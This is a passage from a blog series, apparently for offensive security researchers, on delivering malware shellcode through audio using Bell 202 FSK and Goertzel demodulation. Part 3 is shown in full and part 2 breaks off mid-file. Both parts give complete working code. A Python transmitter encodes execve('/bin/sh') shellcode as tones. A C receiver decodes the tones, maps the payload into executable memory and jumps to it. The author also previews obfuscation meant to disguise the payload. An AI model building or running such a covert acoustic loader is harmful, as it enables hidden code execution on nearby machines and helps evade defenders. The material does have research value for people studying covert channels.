cocomelonc

Malware shellcode delivery via signal - part 3. Fix straddling, ALSA buffer overrun, and sub-bit alignment. Simple python and C examples

2026-05-28T03:00:00+00:00

﷽

Hello, cybersecurity enthusiasts and white hackers!

In part 2, we formalized our acoustic protocol. It looked great on paper, but the moment we move from a virtual loopback to a real-world environment with a physical microphone and speakers, the reliability drops to near zero.

Why? Two compounding problems. Today, we fix both and turn our receiver into a reliable DSP tool.

problem 1: bit straddling. Our protocol uses 300 baud at 48.000 Hz, giving us exactly 160 samples per bit (SPB). The assumption in a naive implementation is that the first sample we read from the microphone is also the first sample of a bit. But the transmitter starts playing whenever it wants - our CPU and sound card are not perfectly synced. If our 160-sample Goertzel window starts at sample 80, it sees 50% of Bit N and 50% of Bit N+1. The energy of both 1200Hz and 2200Hz gets “smeared,” leading to corrupted bits and checksum failures.

To solve this without complex Phase-Locked Loops (PLL), we implement sub-bit offset scanning. Instead of processing the audio once, we record a 6-second block and process it 16 times, shifting the starting point by 10 samples each time.

problem 2: ALSA buffer overrun (EPIPE). Part 2’s receiver captured audio with a single call:

snd_pcm_readi(h, buf, 288000); // 6 seconds = 288,000 samples in one shot

ALSA’s internal ring buffer is only a few hundred milliseconds deep. Asking for 6 seconds of audio in one blocking call almost guarantees an overrun - ALSA’s ring buffer fills up and wraps around before we drain it. When EPIPE fires, snd_pcm_readi returns an error code. Part 2 ignores the return value entirely, so buf is silently left full of zeros or stale data. The Goertzel decoder runs on garbage, and the checksum always fails. No error is ever printed.

The core change is the Brute-force alignment loop. The main function now acts as a coordinator. It captures the sound once and then “punches” through it with different offsets.

#define N_OFFSETS    16           // try 16 different alignments
#define OFFSET_STEP  (SPB / N_OFFSETS) // shift by 10 samples each time

for (int t = 0; t < N_OFFSETS; t++) {
  int offset = t * OFFSET_STEP; 
  // try_offset will attempt to find a valid preamble at this specific offset
  if (try_offset(audio_buffer, total_samples, offset)) {
    printf("[=^..^=] victory! alignment found at offset %d\n", offset);
    return 0;
  }
}

The try_offset function doesn’t just “listen” - it reconstructs the entire bitstream from a specific starting point. If the 40-bit preamble matches and the XOR checksum is valid, we know we’ve found the bit grid:

// logic inside try_offset
for (int i = 0; i < n_bits; i++) {
  // we start processing exactly at 'audio + offset'
  double pm = goertzel(audio + offset + i * SPB, SPB, FREQ_MARK);
  double ps = goertzel(audio + offset + i * SPB, SPB, FREQ_SPACE);
  bits[i] = (pm > ps) ? 1 : 0;
}

In the second part, the checksum was simply a check. In the third part now, it’s an indicator of brute force success. If the checksum doesn’t match, we don’t fail with an error, we simply move on to the next offset.

practical example

The part 2 receiver captures the full 6-second audio buffer with one call and ignores the return value:

int total = CAPTURE_SECS * SAMPLE_RATE;   // 288,000 samples
int16_t *buf = malloc(total * sizeof(int16_t));
printf("[=^..^=] listening for 6 seconds...\n");
snd_pcm_readi(h, buf, total);             // return value discarded
snd_pcm_close(h);

If ALSA’s ring buffer overruns during those 6 seconds, snd_pcm_readi returns -EPIPE. Because the return value is never checked, the code proceeds to run the Goertzel decoder on an uninitialized or zeroed buffer. The checksum always fails, and no error is ever shown.

so, how can we fix this in this part? First of all, capture_audio() reads in small 0.1-second chunks (4800 samples). If EPIPE fires, it calls snd_pcm_prepare() to reset the device and retries immediately. This ensures the buffer is always fully and correctly filled before decoding begins:

static int16_t *capture_audio(snd_pcm_t *h, int *out_samples) {
  int total = CAPTURE_SECS * SAMPLE_RATE;
  int16_t *buf = malloc((size_t)total * sizeof(int16_t));

  int got = 0;
  while (got < total) {
    int want = total - got;
    if (want > 4800) want = 4800;          /* 0.1 s chunks */
    int rc = snd_pcm_readi(h, buf + got, (snd_pcm_uframes_t)want);
    if (rc == -EPIPE) { snd_pcm_prepare(h); continue; }  /* recover overrun */
    if (rc < 0) {
      fprintf(stderr, "[=^..^=] read error: %s\n", snd_strerror(rc));
      free(buf); return NULL;
    }
    got += rc;
  }
  *out_samples = got;
  return buf;
}

Only after a full, verified capture does the receiver run the 16-offset Goertzel scan. The two fixes together - reliable capture and sub-bit alignment scanning - are what make the receiver work in the real world.

So, full source code for transmission logic is looks like the following transmit_live.py:

#!/usr/bin/env python3
"""
transmit_live.py
acoustic shellcode transmitter - part 1: live visualization
author: @cocomelonc
"""
import time
import struct
import numpy as np
import sounddevice as sd
import matplotlib.pyplot as plt

# protocol constants (must match receiver.c exactly)
SAMPLE_RATE  = 48000
BAUD_RATE    = 300
FREQ_MARK    = 2200          # bit 1 (high)
FREQ_SPACE   = 1200          # bit 0 (low)
SPB          = SAMPLE_RATE // BAUD_RATE # 160 samples per bit
PREAMBLE     = bytes([0xAA, 0xAA, 0xAA, 0xAA, 0x7E])

# visualization constants
WINDOW_BITS  = 24            # how many bits to show in the sliding window
WINDOW_SAMPS = SPB * WINDOW_BITS
TARGET_FPS   = 30            # smooth animation

# linux x86_64 execve("/bin/sh")
SHELLCODE = bytes([
    0x48, 0x31, 0xc0, 0x50, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 
    0x2f, 0x2f, 0x73, 0x68, 0x53, 0x48, 0x89, 0xe7, 0x50, 0x57, 
    0x48, 0x89, 0xe6, 0x48, 0x31, 0xd2, 0xb0, 0x3b, 0x0f, 0x05
])

def build_frame(payload):
    """wraps payload in: preamble + 2-byte big-endian length + payload + XOR checksum.
    this is the wire format that receiver.c expects."""
    cksum = 0
    for b in payload:
        cksum ^= b
    return PREAMBLE + struct.pack('>H', len(payload)) + payload + bytes([cksum])

def generate_tone(bit):
    """generates a sine wave for a single bit."""
    freq = FREQ_MARK if bit else FREQ_SPACE
    t = np.arange(SPB) / SAMPLE_RATE
    return np.sin(2 * np.pi * freq * t).astype(np.float32)

def byte_to_signal(byte):
    """converts a single byte into an audio signal."""
    return np.concatenate([generate_tone((byte >> i) & 1) for i in range(8)])

def build_figure():
    """sets up the matplotlib figure for live plotting."""
    plt.style.use('dark_background')
    fig, (ax_wave, ax_spec) = plt.subplots(2, 1, figsize=(12, 6))
    fig.suptitle('[=^..^=] live acoustic transmission', color='#00ff88')
    
    # waveform plot setup
    line_wave, = ax_wave.plot(np.arange(WINDOW_SAMPS), np.zeros(WINDOW_SAMPS), color='#00ffff', lw=1)
    ax_wave.set_ylim(-1.2, 1.2)
    ax_wave.set_axis_off()
    
    # spectrum plot setup (FFT)
    freqs = np.fft.rfftfreq(WINDOW_SAMPS, d=1.0/SAMPLE_RATE)
    line_spec, = ax_spec.plot(freqs, np.zeros(len(freqs)), color='#ffaa00', lw=1.5)
    ax_spec.set_xlim(0, 4000)
    ax_spec.set_ylim(0, 1)
    ax_spec.set_xlabel('frequency (Hz)')
    ax_spec.set_ylabel('magnitude')
    
    plt.tight_layout()
    return fig, line_wave, line_spec

def transmit_live(payload):
    # build framed signal: preamble + length + payload + checksum
    frame  = build_frame(payload)
    body   = np.concatenate([byte_to_signal(b) for b in frame])
    lead   = np.zeros(int(SAMPLE_RATE * 0.5), dtype=np.float32)
    signal = np.concatenate([lead, body, lead])
    total_samples = len(signal)

    cksum = 0
    for b in payload: cksum ^= b
    print(f"[=^..^=] shellcode : {len(payload)} bytes")
    print(f"[=^..^=] frame     : {len(frame)} bytes  ({len(frame)*8} bits)")
    print(f"[=^..^=] checksum  : 0x{cksum:02x}")
    print(f"[=^..^=] duration  : {total_samples/SAMPLE_RATE:.2f} s")

    # setup visualization
    fig, line_wave, line_spec = build_figure()
    plt.ion() # interactive mode ON
    plt.show()

    # start audio in background
    print("[=^..^=] transmitting...")
    sd.play(signal, SAMPLE_RATE)
    start_time = time.perf_counter()

    # live plot loop
    while True:
        elapsed = time.perf_counter() - start_time
        current_sample = int(elapsed * SAMPLE_RATE)
        
        if current_sample >= total_samples:
            break
            
        # sliding window logic
        start = max(0, current_sample - WINDOW_SAMPS // 2)
        end = start + WINDOW_SAMPS
        
        if end > total_samples:
            end = total_samples
            start = end - WINDOW_SAMPS

        window = signal[start:end]
        
        # update waveform
        line_wave.set_ydata(window)
        
        # update spectrum (FFT)
        mag = np.abs(np.fft.rfft(window))
        if mag.max() > 0: mag /= mag.max() # normalize
        line_spec.set_ydata(mag)

        fig.canvas.draw_idle()
        plt.pause(1/TARGET_FPS)

    sd.wait()
    plt.ioff() # interactive mode OFF
    print("[=^..^=] done.")
    plt.show()

if __name__ == "__main__":
    transmit_live(SHELLCODE)

and for receiver.c:

/*
 * receiver.c
 * real-time FSK acoustic shellcode receiver (Linux / ALSA)
 * author :  @cocomelonc
 */
#include 
#include 
#include 
#include 
#include 
#include 
#include 

// Bell 202 and DSP Constants
#define PI          3.14159265358979323846
#define SAMPLE_RATE 48000
#define BAUD_RATE   300
#define FREQ_MARK   2200          // bit 1 - high tone
#define FREQ_SPACE  1200          // bit 0 - low tone
#define SPB         (SAMPLE_RATE / BAUD_RATE)   // 160 samples per bit

// brute-force params
#define CAPTURE_SECS  6                // record this many seconds of audio
#define N_OFFSETS    16                // alignment tries per bit period   
#define OFFSET_STEP  (SPB / N_OFFSETS) // 10 samples per step

// frame preamble for synchronization
static const uint8_t PREAMBLE[] = {0xAA, 0xAA, 0xAA, 0xAA, 0x7E};
#define PREAMBLE_LEN  5
#define PREAMBLE_BITS (PREAMBLE_LEN * 8)        // 40 bits

// Goertzel algorithm: detects the magnitude of a specific frequency in a block of samples
static double goertzel(const int16_t *s, int n, double freq) {
  double omega = 2.0 * PI * freq / (double)SAMPLE_RATE;
  double coeff = 2.0 * cos(omega);
  double q1 = 0.0, q2 = 0.0, q0;
  for (int i = 0; i < n; i++) {
    q0 = coeff * q1 - q2 + (double)s[i] / 32768.0;
    q2 = q1;
    q1 = q0;
  }
  return q1 * q1 + q2 * q2 - coeff * q1 * q2;
}

// ALSA: open and configure capture device
static snd_pcm_t *open_capture(const char *device) {
  snd_pcm_t *h;
  int rc = snd_pcm_open(&h, device, SND_PCM_STREAM_CAPTURE, 0);
  if (rc < 0) {
    fprintf(stderr, "[=^..^=] cannot open '%s': %s\n", device, snd_strerror(rc));
    return NULL;
  }
  rc = snd_pcm_set_params(h,
    SND_PCM_FORMAT_S16_LE,
    SND_PCM_ACCESS_RW_INTERLEAVED,
    1, SAMPLE_RATE, 1, 100000);
  if (rc < 0) {
    fprintf(stderr, "[=^..^=] set_params failed: %s\n", snd_strerror(rc));
    snd_pcm_close(h);
    return NULL;
  }
  return h;
}

// capture CAPTURE_SECS seconds into a heap buffer
static int16_t *capture_audio(snd_pcm_t *h, int *out_samples) {
  int total = CAPTURE_SECS * SAMPLE_RATE;
  int16_t *buf = malloc((size_t)total * sizeof(int16_t));
  if (!buf) { fprintf(stderr, "[=^..^=] OOM\n"); return NULL; }

  int got = 0, prev_sec = CAPTURE_SECS + 1;
  while (got < total) {
    int want = total - got;
    if (want > 4800) want = 4800;   /* 0.1 s chunks */
    int rc = snd_pcm_readi(h, buf + got, (snd_pcm_uframes_t)want);
    if (rc == -EPIPE) { snd_pcm_prepare(h); continue; }
    if (rc < 0) {
      fprintf(stderr, "\n[=^..^=] read error: %s\n", snd_strerror(rc));
      free(buf);
      return NULL;
    }
    got += rc;
    int secs_left = CAPTURE_SECS - got / SAMPLE_RATE;
    if (secs_left != prev_sec) {
      prev_sec = secs_left;
      printf("\r[=^..^=] listening... %2d s remaining   ", secs_left);
      fflush(stdout);
    }
  }
  printf("\r[=^..^=] capture complete - %d samples (%d s)          \n\n",
         got, CAPTURE_SECS);
  *out_samples = got;
  return buf;
}

// bit extraction: 8 bits LSB-first from a flat bit array
static uint8_t get_byte(const uint8_t *bits, int bit_offset) {
  uint8_t res = 0;
  for (int i = 0; i < 8; i++)
    if (bits[bit_offset + i]) res |= (uint8_t)(1u << i);
  return res;
}

// demodulate at a given sample offset -> allocated bit array
static uint8_t *demodulate(const int16_t *audio, int n_samples,
                            int offset, int *out_bits) {
  int usable = n_samples - offset;
  int n_bits  = usable / SPB;
  if (n_bits <= 0) { *out_bits = 0; return NULL; }

  uint8_t *bits = malloc((size_t)n_bits);
  if (!bits) { *out_bits = 0; return NULL; }

  const int16_t *p = audio + offset;
  for (int i = 0; i < n_bits; i++) {
    double pm = goertzel(p + i * SPB, SPB, FREQ_MARK);
    double ps = goertzel(p + i * SPB, SPB, FREQ_SPACE);
    bits[i]   = (pm > ps) ? 1 : 0;
  }
  *out_bits = n_bits;
  return bits;
}

// ASCII progress bar
static void progress(int done, int total) {
  int w = 40, filled = total ? done * w / total : 0;
  printf("\r[=^..^=] receiving  [");
  for (int i = 0; i < w; i++) putchar(i < filled ? '#' : '.');
  printf("]  %d / %d bytes", done, total);
  fflush(stdout);
}

// try one sample offset; returns 1 and executes on success
static int try_offset(const int16_t *audio, int n_samples, int offset) {
  int n_bits = 0;
  uint8_t *bits = demodulate(audio, n_samples, offset, &n_bits);
  if (!bits) return 0;

  // scan for preamble; need at least preamble + 2B length + 1B checksum
  int limit    = n_bits - PREAMBLE_BITS - 24;
  int pre_bit  = -1;
  for (int i = 0; i < limit; i++) {
    int match = 1;
    for (int b = 0; b < PREAMBLE_LEN && match; b++) {
      if (get_byte(bits, i + b * 8) != PREAMBLE[b]) match = 0;
    }
    if (match) { pre_bit = i; break; }
  }

  if (pre_bit < 0) {
    printf("[=^..^=] offset %3d: preamble not found\n", offset);
    free(bits);
    return 0;
  }

  printf("[=^..^=] offset %3d: preamble at bit %d - decoding...\n",
         offset, pre_bit);

  int cursor = pre_bit + PREAMBLE_BITS;

  // 2-byte big-endian length
  if (cursor + 16 > n_bits) {
    printf("[=^..^=] offset %3d: truncated after preamble\n", offset);
    free(bits); return 0;
  }
  uint8_t l1 = get_byte(bits, cursor); cursor += 8;
  uint8_t l2 = get_byte(bits, cursor); cursor += 8;
  uint16_t pay_len = ((uint16_t)l1 << 8) | l2;

  if (pay_len == 0 || cursor + ((int)pay_len + 1) * 8 > n_bits) {
    printf("[=^..^=] offset %3d: length %u implausible or out of range\n",
           offset, pay_len);
    free(bits); return 0;
  }

  uint8_t *payload = malloc(pay_len);
  if (!payload) { free(bits); return 0; }

  uint8_t cksum_calc = 0;
  for (int i = 0; i < (int)pay_len; i++) {
    payload[i]  = get_byte(bits, cursor);
    cksum_calc ^= payload[i];
    cursor += 8;
    progress(i + 1, pay_len);
  }
  printf("\n");

  uint8_t cksum_rx = get_byte(bits, cursor);
  free(bits);

  if (cksum_calc != cksum_rx) {
    printf("[=^..^=] offset %3d: checksum FAIL  calc=0x%02x  rx=0x%02x\n",
           offset, cksum_calc, cksum_rx);
    free(payload);
    return 0;
  }

  printf("[=^..^=] offset %3d: checksum OK (0x%02x)\n", offset, cksum_rx);
  printf("[=^..^=] payload length : %u bytes\n\n", pay_len);

  printf("[=^..^=] shellcode recovered (%u bytes):\n", pay_len);
  for (int i = 0; i < (int)pay_len; i++) {
    printf("%02x ", payload[i]);
    if ((i + 1) % 16 == 0) printf("\n");
  }
  if (pay_len % 16 != 0) printf("\n");
  printf("\n");

  void *mem = mmap(NULL, pay_len,
                   PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_ANON | MAP_PRIVATE, -1, 0);
  if (mem == MAP_FAILED) {
    perror("[=^..^=] mmap");
    free(payload);
    return 0;
  }

  memcpy(mem, payload, pay_len);
  free(payload);

  printf("[=^..^=] jumping to shellcode...  =^..^=\n");
  ((void(*)())mem)();

  munmap(mem, pay_len);
  return 1;
}

// main
int main(int argc, char **argv) {
  const char *device = (argc > 1) ? argv[1] : "default";
  printf("[=^..^=] receiver  Bell 202 FSK  %d/%d Hz  %d baud  %d kHz\n",
         FREQ_MARK, FREQ_SPACE, BAUD_RATE, SAMPLE_RATE / 1000);
  printf("[=^..^=] capture device : %s\n", device);
  printf("[=^..^=] SPB            : %d samples per bit\n", SPB);
  printf("[=^..^=] strategy       : batch capture + %d alignment offsets\n\n",
         N_OFFSETS);

  snd_pcm_t *handle = open_capture(device);
  if (!handle) return 1;

  int n_samples = 0;
  int16_t *audio = capture_audio(handle, &n_samples);
  snd_pcm_close(handle);
  if (!audio) return 1;

  printf("[=^..^=] scanning %d alignment offsets (step = %d samples)...\n\n",
         N_OFFSETS, OFFSET_STEP);

  for (int t = 0; t < N_OFFSETS; t++) {
    int offset = t * OFFSET_STEP;
    if (try_offset(audio, n_samples, offset)) {
      free(audio);
      return 0;
    }
  }

  free(audio);
  printf("\n[=^..^=] no valid frame found in %d s of audio\n", CAPTURE_SECS);
  printf("transmitter: python3 transmit_live.py (device: hw:Loopback,0,0)\n");
  return 1;
}

demo

Let’s see this in action. Compile receiver:

gcc receiver.c -o receiver -lasound -lm

Then, run it:

./receiver

Then, run transmitting logic (for simplicity, same device first):

python3 transmit_live.py

Finally, we got our shell:

try it without transmission:

./receiver

And for two devices:

As you can see, perfectly works as expected! =^..^=

conclusion

In the next part, we will add a mathematical obfuscation layer on top of the working protocol we built here. The shellcode will never travel as raw bytes. Instead, we apply a Forward Discrete Fourier Transform with a secret phase shift - the raw bytes become complex frequency coefficients that look like noise to any observer. The receiver applies the Inverse DFT with the same key to reconstruct the original shellcode just before execution.

We will also show another example (just as case), if we need to switch from a live microphone to a WAV file as the transport medium. This removes all the ALSA capture complexity - the receiver simply reads payload.wav, runs Goertzel demodulation on the known-good samples, and recovers the shellcode. No alignment scan required, no EPIPE to handle. A clean controlled channel - which will make it straightforward to demonstrate on both Linux and Windows.

This series of posts is based on my research and the results that I first presented at the BSides Prishtina 2026 conference. If I make significant progress in this research, I may also present my findings at other conferences.

FSK
Bell 202 standard
Discrete Fourier Transform (DFT)
Goertzel Algorithm
source code in github

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

Malware shellcode delivery via signal - part 2. The Linux receiver (Goertzel Algorithm). Simple C example

2026-05-26T03:00:00+00:00

﷽

Hello, cybersecurity enthusiasts and white hackers!

This is the second post in our series on Signal Processing and Math for Malware R&D. In part 1, we proved that we could turn bytes into sound. However, if you tried to run that code in a noisy room, you likely noticed it rarely worked.

Today, we solve the two biggest enemies of acoustic data transfer: Framing and Synchronization. We will transform our “beeping” script into a real-use communication protocol.

the problem

In our initial research, we sent raw bits. This approach fails in real-world scenarios for two technical reasons: First of all, the receiver doesn’t know exactly when the first bit begins. If it starts recording even 5 milliseconds late, it misses the start of the first sine wave. Second problem is bit straddling. If the receiver’s 160-sample window starts in the middle of a bit, the Goertzel filter sees half of a 1 and half of a 0. The resulting signal values are ambiguous, leading to a “bit-flip” and corrupted shellcode.

To fix this, we need to wrap our shellcode in a frame.

defining the protocol frame

In the simple words, a frame is a structured packet that tells the receiver something like: “get ready, here is how much data is coming, and here is a way to check if it arrived safely.”

Our frame structure:

What is the preamble here? We use 0xAA 0xAA 0xAA 0xAA 0x7E. The alternating bits (1010...) help the receiver find the “pulse” of the transmission. Two bytes in length is a big-endian integer representing the shellcode size. By reading the length byte right after the preamble, the receiver knows exactly how many 160-sample windows to process sequentially, ensuring perfect synchronization without slipping into mid-bit boundaries. Finally, a checksum is a XOR sum of the payload to ensure integrity. So, in our code, we need the following logic: if a residual bit flip still occurs due to background acoustic noise, the checksum validation fails, dropping the packet instead of passing corrupted payload bytes to the execution engine.

In Python, building this frame looks like this:

def build_frame(payload):
    # calculate XOR checksum
    cksum = 0
    for b in payload:
        cksum ^= b
    # combine everything into one byte array
    return PREAMBLE + struct.pack('>H', len(payload)) + payload + bytes([cksum])

brute-force strategy in receiver

The biggest challenge in the C receiver is sample alignment. Since we don’t know where the bit grid starts, we use a “brute-force” strategy. We record a 6-second chunk of audio. Then, we try to demodulate it 16 different times, shifting the starting point by 10 samples each time (since one bit is 160 samples, 160/16 = 10). One of these 16 attempts must align perfectly with the transmitter’s grid.

The logic in C looks like this:

for (int t = 0; t < 16; t++) {
  int offset = t * 10; // try every 10th sample
  if (try_offset(audio_buffer, total_samples, offset)) {
    // success! frame found and executed.
    break; 
  }
}

demodulation via Goertzel

For every 160-sample window, we apply the Goertzel algorithm. It acts as a high-speed “tuning fork” for our frequencies: 2200 Hz (Mark) and 1200 Hz (Space).

The math for our filter coefficient $ w $ is: $\omega = \frac{2\pi \cdot f_{target}}{f_{sampling}}, \quad w = 2 \cos(\omega)$

For each trial offset, we convert the audio into a flat array of bits (0 or 1) and then scan that array for our 0xAA... preamble:

double goertzel(const int16_t *s, int n, double freq) {
  double omega = 2.0 * M_PI * freq / SAMPLE_RATE;
  double coeff = 2.0 * cos(omega);
  double q1 = 0, q2 = 0, q0;
  for (int i = 0; i < n; i++) {
    q0 = coeff * q1 - q2 + (double)s[i] / 32768.0;
    q2 = q1; q1 = q0;
  }
  return q1 * q1 + q2 * q2 - coeff * q1 * q2;
}

practical example

Let me try to explain the logic behind try_offset. Because the receiver starts recording at an arbitrary time, the “bit grid” is unknown. This function is designed to test a specific sample offset to see if it perfectly aligns with the transmitted tones.

Our function starts by slicing the raw audio buffer into bit-sized chunks (160 samples each), starting exactly at the provided offset:

int n_bits = (n_samples - offset) / SPB;
uint8_t *bits = malloc(n_bits);
for (int i = 0; i < n_bits; i++) {
  double pm = goertzel(audio + offset + i * SPB, SPB, FREQ_MARK);
  double ps = goertzel(audio + offset + i * SPB, SPB, FREQ_SPACE);
  bits[i] = (pm > ps) ? 1 : 0;
}

In general, here we convert the “analog” audio samples into a digital array of 1s and 0s.

If $ pm > ps $, we record a 1. Otherwise, a 0. By trying different offsets in the main loop, we eventually find one where the window doesn’t “straddle” two different bits, resulting in a clean digital signal.

Next we need a preable hunting logic. Once we have a bit array, we need to find where the actual data starts. We scan the array for our 40-bit preamble (0xAA 0xAA 0xAA 0xAA 0x7E):

for (int i = 0; i < n_bits - 80; i++) {
  int match = 1;
  for (int b = 0; b < 5; b++) 
    if (get_byte(bits, i + b * 8) != PREAMBLE[b]) match = 0;
  if (!match) continue;

Then extracting metadata (Length), so, immediately following the preamble are 16 bits (2 bytes) that define the shellcode size:

int cursor = i + 40; // skip preamble (40 bits)
uint16_t len = (get_byte(bits, cursor) << 8) | get_byte(bits, cursor + 8);
cursor += 16; // move past length field

The loader now knows exactly how many bytes to extract from the bit stream. It assembles the 16-bit integer from two 8-bit characters.

Then, the loader extracts the payload byte-by-byte while simultaneously calculating an XOR checksum:

uint8_t *payload = malloc(len);
uint8_t calc_cksum = 0;
for (int p = 0; p < len; p++) {
  payload[p] = get_byte(bits, cursor);
  calc_cksum ^= payload[p];
  cursor += 8;
}

What is the error detectin logic here? As each byte is recovered, it is XORed into calc_cksum. This ensures that any “acoustic interference” (like a door slamming or a cough) that flipped a bit will be detected.

At the last step, we need final verification and execution. If the checksum matches the final byte in the frame, we move from data processing to code execution:

if (calc_cksum == get_byte(bits, cursor)) {
  printf("[=^..^=] offset %d: checksum OK. executing %d bytes...\n", offset, len);
  void *mem = mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0);
  memcpy(mem, payload, len);
  ((void(*)())mem)();
  return 1;
}

If calc_cksum matches the received byte, we know the shellcode is 100% intact.

So, full source code of this function:

int try_offset(const int16_t *audio, int n_samples, int offset) {
  int n_bits = (n_samples - offset) / SPB;
  uint8_t *bits = malloc(n_bits);
  for (int i = 0; i < n_bits; i++) {
    double pm = goertzel(audio + offset + i * SPB, SPB, FREQ_MARK);
    double ps = goertzel(audio + offset + i * SPB, SPB, FREQ_SPACE);
    bits[i] = (pm > ps) ? 1 : 0;
  }

  for (int i = 0; i < n_bits - 80; i++) {
    int match = 1;
    for (int b = 0; b < 5; b++) if (get_byte(bits, i + b * 8) != PREAMBLE[b]) match = 0;
    if (!match) continue;

    int cursor = i + 40;
    uint16_t len = (get_byte(bits, cursor) << 8) | get_byte(bits, cursor + 8);
    cursor += 16;

    uint8_t *payload = malloc(len);
    uint8_t calc_cksum = 0;
    for (int p = 0; p < len; p++) {
      payload[p] = get_byte(bits, cursor);
      calc_cksum ^= payload[p];
      cursor += 8;
    }

    if (calc_cksum == get_byte(bits, cursor)) {
      printf("[=^..^=] offset %d: checksum OK. executing %d bytes...\n", offset, len);
      void *mem = mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0);
      memcpy(mem, payload, len);
      ((void(*)())mem)();
      return 1;
    }
    free(payload);
  }
  free(bits);
  return 0;
}

The try_offset function is the core engine of our acoustic ear. It combines frequency detection with a brute-force alignment strategy. By iterating through sample offsets and verifying the result with an XOR checksum, the loader guarantees that it only executes a perfectly reconstructed payload, effectively turning a noisy room into a reliable delivery vector.

Otherwise, the logic is the same as in the first part, we use alsa/asoundlib.h. We configure the hardware to match our transmitter: 48,000 Hz sampling rate, Mono, and 16-bit signed format:

snd_pcm_t *handle;
snd_pcm_open(&handle, "default", SND_PCM_STREAM_CAPTURE, 0);
snd_pcm_set_params(handle, SND_PCM_FORMAT_S16_LE, SND_PCM_ACCESS_RW_INTERLEAVED, 1, 48000, 1, 500000);

So, full source code for transmission is looks like this, includes the protocol framing and the live visualization for our research presentation:

#!/usr/bin/env python3
"""
transmit_live.py
acoustic shellcode transmitter - part 2: framing & sync
author: @cocomelonc
"""
import time
import struct
import numpy as np
import sounddevice as sd
import matplotlib.pyplot as plt

# -- protocol constants (must match receiver.c) --
SAMPLE_RATE  = 48000
BAUD_RATE    = 300
FREQ_MARK    = 2200          # bit 1
FREQ_SPACE   = 1200          # bit 0
SPB          = SAMPLE_RATE // BAUD_RATE # 160 samples per bit
PREAMBLE     = bytes([0xAA, 0xAA, 0xAA, 0xAA, 0x7E])

# -- visualization constants --
WINDOW_BITS  = 24
WINDOW_SAMPS = SPB * WINDOW_BITS
TARGET_FPS   = 30

# -- x64 Linux execve("/bin/sh") --
SHELLCODE = bytes([
    0x48, 0x31, 0xc0, 0x50, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 
    0x2f, 0x2f, 0x73, 0x68, 0x53, 0x48, 0x89, 0xe7, 0x50, 0x57, 
    0x48, 0x89, 0xe6, 0x48, 0x31, 0xd2, 0xb0, 0x3b, 0x0f, 0x05
])

def build_frame(payload):
    cksum = 0
    for b in payload: cksum ^= b
    return PREAMBLE + struct.pack('>H', len(payload)) + payload + bytes([cksum])

def generate_tone(bit):
    freq = FREQ_MARK if bit else FREQ_SPACE
    t = np.arange(SPB) / SAMPLE_RATE
    return np.sin(2 * np.pi * freq * t).astype(np.float32)

def byte_to_signal(byte):
    return np.concatenate([generate_tone((byte >> i) & 1) for i in range(8)])

def build_figure():
    plt.style.use('dark_background')
    fig, (ax_wave, ax_spec) = plt.subplots(2, 1, figsize=(12, 6))
    fig.suptitle('[=^..^=] live acoustic transmission', color='#00ff88')
    line_wave, = ax_wave.plot(np.arange(WINDOW_SAMPS), np.zeros(WINDOW_SAMPS), color='#ffffff', lw=0.8)
    ax_wave.set_ylim(-1.3, 1.3)
    ax_wave.set_axis_off()
    freqs = np.fft.rfftfreq(WINDOW_SAMPS, d=1.0/SAMPLE_RATE)
    line_spec, = ax_spec.plot(freqs, np.zeros(len(freqs)), color='#ffaa00', lw=1.0)
    ax_spec.set_xlim(0, 4000)
    ax_spec.set_ylim(0, 1.1)
    return fig, line_wave, line_spec

def transmit_live(payload):
    frame = build_frame(payload)
    body = np.concatenate([byte_to_signal(b) for b in frame])
    lead = np.zeros(int(SAMPLE_RATE * 0.5), dtype=np.float32)
    signal = np.concatenate([lead, body, lead])
    total_samples = len(signal)

    fig, line_wave, line_spec = build_figure()
    plt.ion()
    plt.show()

    print(f"[=^..^=] shellcode: {len(payload)} bytes | frame: {len(frame)} bytes")
    sd.play(signal, SAMPLE_RATE)
    t_start = time.perf_counter()

    while True:
        elapsed = time.perf_counter() - t_start
        curr = int(elapsed * SAMPLE_RATE)
        if curr >= total_samples: break
        start = max(0, curr - WINDOW_SAMPS // 2)
        window = signal[start:start + WINDOW_SAMPS]
        if len(window) < WINDOW_SAMPS: window = np.pad(window, (0, WINDOW_SAMPS - len(window)))
        line_wave.set_ydata(window)
        mag = np.abs(np.fft.rfft(window))
        if mag.max() > 0: mag /= mag.max()
        line_spec.set_ydata(mag)
        fig.canvas.draw_idle()
        plt.pause(1.0/TARGET_FPS)

    sd.wait()
    print("[=^..^=] transmission finished.")

if __name__ == "__main__":
    transmit_live(SHELLCODE)

and for receiver, full source code in C looks like this (receiver.c):

/*
 * receiver.c
 * batch FSK receiver with brute-force alignment scanning.
 * author: @cocomelonc
 */
#include 
#include 
#include 
#include 
#include 
#include 
#include 

// Bell 202 and DSP Constants
#define PI          3.14159265358979323846
#define SAMPLE_RATE 48000
#define BAUD_RATE   300
#define FREQ_MARK   2200            // frequency for Bit 1
#define FREQ_SPACE  1200            // frequency for Bit 0
#define SPB         (SAMPLE_RATE / BAUD_RATE)   // samples per Bit (160)

// brute-force alignment parameters
#define CAPTURE_SECS 6              // capture duration
#define N_OFFSETS    16             // number of trial offsets per bit period
#define OFFSET_STEP  (SPB / N_OFFSETS) // 10 samples shift per trial

// frame preamble for synchronization
static const uint8_t PREAMBLE[] = {0xAA, 0xAA, 0xAA, 0xAA, 0x7E};

// Goertzel algorithm: detects the magnitude of a specific frequency in a block of samples
static double goertzel(const int16_t *s, int n, double freq) {
  double omega = 2.0 * PI * freq / (double)SAMPLE_RATE;
  double coeff = 2.0 * cos(omega);
  double q1 = 0.0, q2 = 0.0, q0;
  for (int i = 0; i < n; i++) {
    // normalize 16-bit PCM to float and apply recursive filter
    q0 = coeff * q1 - q2 + (double)s[i] / 32768.0;
    q2 = q1;
    q1 = q0;
  }
  return q1 * q1 + q2 * q2 - coeff * q1 * q2;
}

// reconstructs a byte from a bit stream (LSB-first)
uint8_t get_byte(const uint8_t *bits, int offset) {
  uint8_t res = 0;
  for (int i = 0; i < 8; i++) if (bits[offset + i]) res |= (uint8_t)(1u << i);
  return res;
}

// tries to decode the captured audio buffer starting at a specific sample offset
